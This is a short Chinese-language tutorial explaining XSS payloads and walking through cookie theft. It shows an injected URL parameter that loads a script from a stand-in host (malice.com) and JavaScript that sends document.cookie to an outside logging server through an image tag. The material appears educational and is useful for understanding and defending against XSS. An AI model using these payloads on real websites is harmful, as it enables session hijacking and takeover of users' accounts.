完成具體功能的惡意腳本（javaScript、Flash 等）稱為 XSS Payload。黑客會通過這些腳本，來控制用戶的瀏覽器。劫持 Cookie 就是一種 XSS Payload。 Cookie 中，一般加密存放著當前用戶的登陸憑證。如果 Cookie 被劫持，那么黑客就可以不使用密碼，直接登陸到用戶的賬號中 ### 竊取 Cookie 首先先在存在 XSS 漏洞的網站，加載一段遠程腳本，形如： ~~~ http://www.xxx.com/xxx.html?param="><script src=http://www.malice.com/malice.js></script> ~~~ XSS Payload 寫在 malice.js 中，這樣就可以避免直接在 URL 參數中寫入大量的腳本代碼。 malice.js 內容： ~~~ var img = document.createElement("img"); img.src = "http://xxx.com/log?" + escape(document.cookie); document.body.appendChild(img); ~~~ escape() 函數可對字符串進行編碼，這樣就可以在所有的計算機上讀取該字符串。在此，我們動態創建了一個圖片標簽，并把 cookie 參數作為對象，發送給后端服務器  這樣就完成了竊取 Cookie 的整個過程